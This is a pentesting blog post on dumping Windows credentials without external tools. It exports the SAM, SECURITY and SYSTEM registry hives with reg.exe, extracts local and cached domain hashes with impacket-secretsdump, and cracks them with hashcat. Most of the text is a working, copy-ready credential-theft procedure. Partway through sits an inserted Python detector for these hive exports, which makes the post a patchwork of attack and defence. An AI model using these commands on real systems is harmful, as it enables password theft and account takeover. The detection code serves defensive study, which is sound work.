How to export/crack SAM database with internal Windows tools if you do not have access to mimikatz / hashdump / metasploit. As a bonus we also look at cached domain hashes. #LINUX4HACKERS #HASHCAT #LINUX #INFOSEC #HACKING #PENTEST #PENTESTING #REDTEAM #NVIDA #TESLAM60


I wanted to dump hashes on a Windows 10 box without any external tools. This is how I did it.

We start with the short version:

  1. Export the SAM, SECURITY and SYSTEM hives with reg.exe
  2. Extract the hashes from the saved hives with impacket-secretsdump
  3. Crack the hashes with hashcat

First we export the SAM database with reg.exe. We also need the SECURITY and SYSTEM hives, because SYSTEM holds the boot key that decrypts the other two.

reg.exe save hklm\sam c:\tmp\sam.hiv
reg.exe save hklm\security c:\tmp\security.hiv
reg.exe save hklm\system c:\tmp\system.hiv
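The hive export above is exactly the activity a defender should alert on. As an added example (not part of the original post), here is a Python check that runs over process-creation records, such as the command-line field of Sysmon event 1 or Security event 4688, and flags saves of the SAM, SECURITY and SYSTEM hives plus the user contexts that saved all three; the event records and their field names are constructed for illustration.

```python
import re

# Constructed sample process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\jdoe", "cmd": r"reg.exe save hklm\sam c:\tmp\sam.hiv"},
    {"host": "ws01", "user": "CORP\\jdoe", "cmd": r"reg.exe save hklm\security c:\tmp\security.hiv"},
    {"host": "ws01", "user": "CORP\\jdoe", "cmd": r"REG SAVE HKEY_LOCAL_MACHINE\SYSTEM C:\tmp\system.hiv"},
    {"host": "ws02", "user": "CORP\\admin", "cmd": r"reg.exe query hklm\software\microsoft\windows\currentversion\run"},
    {"host": "ws02", "user": "CORP\\admin", "cmd": r"reg.exe save hkcu\software\myapp c:\backup\myapp.hiv"},
]

# The three hives that together allow offline decryption of local and cached credentials.
SENSITIVE_HIVES = {"sam", "security", "system"}

# Matches "reg[.exe] save <root>\<hive> ..." in any case, with either the short HKLM
# root or the long HKEY_LOCAL_MACHINE root, optionally quoted, and with or without
# a full path in front of reg.exe.
_REG_SAVE = re.compile(
    r"""(?:^|[\\\s"'])reg(?:\.exe)?["']?\s+save\s+["']?(?:hklm|hkey_local_machine)\\([a-z]+)""",
    re.IGNORECASE,
)


def sensitive_hive_saved(cmd):
    """Return the lower-case hive name if cmd saves SAM, SECURITY or SYSTEM from HKLM, else None."""
    m = _REG_SAVE.search(cmd)
    if not m:
        return None
    hive = m.group(1).lower()
    return hive if hive in SENSITIVE_HIVES else None


def detect(events):
    """Map each (host, user) context to the set of sensitive hives it saved."""
    hits = {}
    for ev in events:
        hive = sensitive_hive_saved(ev["cmd"])
        if hive:
            hits.setdefault((ev["host"], ev["user"]), set()).add(hive)
    return hits


def full_dump_contexts(hits):
    """Contexts that saved all three hives: the complete pattern from this post."""
    return [ctx for ctx, hives in hits.items() if hives == SENSITIVE_HIVES]


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for ctx, hives in found.items():
        print(ctx, sorted(hives))
    print("full dump from:", full_dump_contexts(found))
```

A single hive save can be legitimate backup activity, so the per-context grouping is what turns the three separate events into one high-confidence alert.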

It is time to get the hashes out of these files.

Transfer the files to a machine that has impacket installed. We need to extract the hashes from these three files. I use impacket-secretsdump and write the output to roger.hash.

impacket-secretsdump -sam ./sam.hiv -security ./security.hiv -system ./system.hiv LOCAL > roger.hash

Now we have a file roger.hash that contains the local account hashes and the cached domain credentials.

Use hashcat to crack the hashes

For local accounts we copy the hashes into a file local.hash.

For cached accounts we do the same, except we strip the leading DOMAIN/username: prefix from each line so that it begins with $DCC2$, which is the format hashcat expects for mode 2100.

Now it is time to crack the hashes. For local accounts we use -m 1000 (NTLM); for cached accounts we use -m 2100 (Domain Cached Credentials 2, also called mscash2).

Cached accounts with a wordlist:

hashcat -m 2100 ./cached.hash /usr/share/wordlists/rockyou.txt

Cached accounts with brute force (-a 3), here without giving any mask file such as guess.mask, so hashcat falls back to its built-in default mask:

hashcat -m 2100 -a 3 ./cached.hash

The same commands work for local accounts, with -m 1000 instead of -m 2100 and local.hash as the input file.

I hope this helps someone out there!

Keep hacking!
